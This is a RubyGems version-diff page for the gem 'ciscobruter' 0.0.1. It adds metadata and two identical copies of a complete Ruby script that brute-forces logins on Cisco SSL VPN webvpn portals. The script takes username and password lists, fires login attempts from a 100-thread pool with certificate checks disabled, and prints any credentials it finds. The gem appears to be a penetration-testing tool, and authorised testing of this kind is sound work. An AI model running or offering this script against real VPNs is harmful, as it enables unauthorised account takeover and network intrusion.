RubyGems - ciscobruter - Versions diffs - 0.0.1 - Mend

ciscobruter 0.0.1

Files changed (4) hide show

checksums.yaml ADDED

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: 8d850b5503f26cdf248c93001be00b7f9cb0e09b566a66e525d5127c0ad08e69
+  data.tar.gz: 070702060b6519eb046519894fe07e5d4a5b137744ead08e02f8e5d1f75e6b5a
+SHA512:
+  metadata.gz: c0e96ef567ab4d99e222073461f461d8ffc7aaf520a5560dbf93ed2e743682fe6ff54ce7d4c4b9b0c04d5c8b7d9960189b74daa892bbd83e4cee95bbc008646c
+  data.tar.gz: 4b7eef8b730f7de5136105cc4224ebeeb20fd1becb19a5f92c9b41bba242b48f76a6039b9f3a723302bfb240bd9f02352dbd6cb70de869c8a7920ef91dd89ffe

data/bin/ciscobruter ADDED

@@ -0,0 +1,114 @@
+#!/usr/bin/env ruby
+require 'net/https'
+require 'optparse'
+require 'celluloid/current'
+require 'thread/pool'
+require 'ruby-progressbar'
+include Celluloid::Internals::Logger
+options = {}
+args = OptionParser.new do |opts|
+  opts.banner = "ciscobruter.rb VERSION: 1.0.0 - UPDATED: 01/20/2016\r\n\r\n"
+  opts.on("-u", "--username   [Username]", "\tUsername to guess passwords against") { |username| options[:usernames] = [username] }
+  opts.on("-p", "--password   [Password]", "\tPassword to try with username") { |password| options[:passwords] = [password] }
+  opts.on("-U", "--user-file  [File Path]", "\tFile containing list of usernames") { |usernames| options[:usernames] = File.open(usernames, 'r').read.split("\n") }
+  opts.on("-P", "--pass-file  [File Path]", "\tFile containing list of passwords") { |passwords| options[:passwords] = File.open(passwords, 'r').read.split("\n") }
+  opts.on("-t", "--target     [URL]", "\tTarget VPN server example: https://vpn.target.com") { |target| options[:target] = target }
+  opts.on("-l", "--login-path [Login Path]", "\tPath to login page.  Default: /+webvpn+/index.html") { |path| options[:path] = path }
+  opts.on("-g", "--group      [Group Name]", "\tGroup name for VPN.  Default: No Group") { |group| options[:group] = group }
+  opts.on("-v", "--verbose", "\tEnables verbose output\r\n\r\n") { |v| options[:verbose] = true }
+end
+begin
+	args.parse!(ARGV)
+	mandatory = [:target]
+	missing = mandatory.select{ |param| options[param].nil? }
+	unless missing.empty?
+		warn "Error.  Missing required options: #{missing.join(', ')}"
+		puts args
+		exit!
+	end
+rescue OptionParser::InvalidOption, OptionParser::MissingArgument
+	puts $!.to_s
+	exit!
+end
+class Ciscobruter
+	attr_accessor :uri, :http, :headers, :verbose, :path, :group
+	def initialize(target, verbose=nil, login=nil, group=nil)
+		self.uri = URI.parse(target)
+		self.path = set_path(login)
+		self.group = group
+		self.http = setup_http
+		self.headers = { 'Cookie' => 'webvpnlogin=1; webvpnLang=en' }
+		self.verbose = verbose
+	end
+	def try_credentials(username, password)
+		info "Trying username: #{username} and password: #{password} on #{uri.host}" if verbose
+		post = "username=#{username}&password=#{password}"
+		if group != nil
+			post += "&group_list=#{group}"
+		end
+		response = http.post(path, post, headers)
+		if response.code == "200"
+			if validate_credentials(response.body)
+				report_creds(username, password)
+			end
+		elsif response.code == "302"
+			warn "Error. #{path} not valid."
+		end
+		return
+	end
+	private
+		def set_path(login)
+			return login.nil? ? '/+webvpn+/index.html' : login
+		end
+		def setup_http
+			http = Net::HTTP.new(uri.host, uri.port)
+			http.use_ssl = true
+			http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+			return http
+		end
+		def validate_credentials(html)
+			return html !~ /document.location.replace/
+		end
+		def report_creds(user, pass)
+			warn "CREDENTIALS FOUND! username: #{user} password: #{pass}"
+		end
+end
+def main(options, total)
+	threads = Thread.pool(100)
+	info "Trying #{total} username/password combinations..."
+	options[:usernames].each do |username|
+		options[:passwords].each do |password|
+			threads.process {
+				bruter = Ciscobruter.new(options[:target], options[:verbose], options[:path], options[:group])
+				bruter.try_credentials(username.chomp, password.chomp)
+				PROGRESS.increment
+			}
+		end
+	end
+	threads.shutdown
+end
+total = options[:usernames].count * options[:passwords].count
+PROGRESS = ProgressBar.create(format: "%a %e %P% Processed: %c from %C", total: total)
+main(options, total)

data/lib/ciscobruter.rb ADDED

@@ -0,0 +1,114 @@
+#!/usr/bin/env ruby
+require 'net/https'
+require 'optparse'
+require 'celluloid/current'
+require 'thread/pool'
+require 'ruby-progressbar'
+include Celluloid::Internals::Logger
+options = {}
+args = OptionParser.new do |opts|
+  opts.banner = "ciscobruter.rb VERSION: 1.0.0 - UPDATED: 01/20/2016\r\n\r\n"
+  opts.on("-u", "--username   [Username]", "\tUsername to guess passwords against") { |username| options[:usernames] = [username] }
+  opts.on("-p", "--password   [Password]", "\tPassword to try with username") { |password| options[:passwords] = [password] }
+  opts.on("-U", "--user-file  [File Path]", "\tFile containing list of usernames") { |usernames| options[:usernames] = File.open(usernames, 'r').read.split("\n") }
+  opts.on("-P", "--pass-file  [File Path]", "\tFile containing list of passwords") { |passwords| options[:passwords] = File.open(passwords, 'r').read.split("\n") }
+  opts.on("-t", "--target     [URL]", "\tTarget VPN server example: https://vpn.target.com") { |target| options[:target] = target }
+  opts.on("-l", "--login-path [Login Path]", "\tPath to login page.  Default: /+webvpn+/index.html") { |path| options[:path] = path }
+  opts.on("-g", "--group      [Group Name]", "\tGroup name for VPN.  Default: No Group") { |group| options[:group] = group }
+  opts.on("-v", "--verbose", "\tEnables verbose output\r\n\r\n") { |v| options[:verbose] = true }
+end
+begin
+	args.parse!(ARGV)
+	mandatory = [:target]
+	missing = mandatory.select{ |param| options[param].nil? }
+	unless missing.empty?
+		warn "Error.  Missing required options: #{missing.join(', ')}"
+		puts args
+		exit!
+	end
+rescue OptionParser::InvalidOption, OptionParser::MissingArgument
+	puts $!.to_s
+	exit!
+end
+class Ciscobruter
+	attr_accessor :uri, :http, :headers, :verbose, :path, :group
+	def initialize(target, verbose=nil, login=nil, group=nil)
+		self.uri = URI.parse(target)
+		self.path = set_path(login)
+		self.group = group
+		self.http = setup_http
+		self.headers = { 'Cookie' => 'webvpnlogin=1; webvpnLang=en' }
+		self.verbose = verbose
+	end
+	def try_credentials(username, password)
+		info "Trying username: #{username} and password: #{password} on #{uri.host}" if verbose
+		post = "username=#{username}&password=#{password}"
+		if group != nil
+			post += "&group_list=#{group}"
+		end
+		response = http.post(path, post, headers)
+		if response.code == "200"
+			if validate_credentials(response.body)
+				report_creds(username, password)
+			end
+		elsif response.code == "302"
+			warn "Error. #{path} not valid."
+		end
+		return
+	end
+	private
+		def set_path(login)
+			return login.nil? ? '/+webvpn+/index.html' : login
+		end
+		def setup_http
+			http = Net::HTTP.new(uri.host, uri.port)
+			http.use_ssl = true
+			http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+			return http
+		end
+		def validate_credentials(html)
+			return html !~ /document.location.replace/
+		end
+		def report_creds(user, pass)
+			warn "CREDENTIALS FOUND! username: #{user} password: #{pass}"
+		end
+end
+def main(options, total)
+	threads = Thread.pool(100)
+	info "Trying #{total} username/password combinations..."
+	options[:usernames].each do |username|
+		options[:passwords].each do |password|
+			threads.process {
+				bruter = Ciscobruter.new(options[:target], options[:verbose], options[:path], options[:group])
+				bruter.try_credentials(username.chomp, password.chomp)
+				PROGRESS.increment
+			}
+		end
+	end
+	threads.shutdown
+end
+total = options[:usernames].count * options[:passwords].count
+PROGRESS = ProgressBar.create(format: "%a %e %P% Processed: %c from %C", total: total)
+main(options, total)

metadata ADDED

@@ -0,0 +1,87 @@
+--- !ruby/object:Gem::Specification
+name: ciscobruter
+version: !ruby/object:Gem::Version
+  version: 0.0.1
+platform: ruby
+authors:
+- Royce Davis
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2020-03-05 00:00:00.000000000 Z
+dependencies:
+- !ruby/object:Gem::Dependency
+  name: thread
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 0.2.2
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 0.2.2
+- !ruby/object:Gem::Dependency
+  name: celluloid
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 0.17.4
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 0.17.4
+- !ruby/object:Gem::Dependency
+  name: ruby-progressbar
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 1.10.1
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - '='
+      - !ruby/object:Gem::Version
+        version: 1.10.1
+description: Brute force Cisco SSL VPN's that don't use 2-factor authentication
+email: royce@pentestgeek.com
+executables:
+- ciscobruter
+extensions: []
+extra_rdoc_files: []
+files:
+- bin/ciscobruter
+- lib/ciscobruter.rb
+homepage: https://rubygems.org/gems/ciscobruter
+licenses:
+- MIT
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.0.3
+signing_key:
+specification_version: 4
+summary: Ciscobruter!
+test_files: []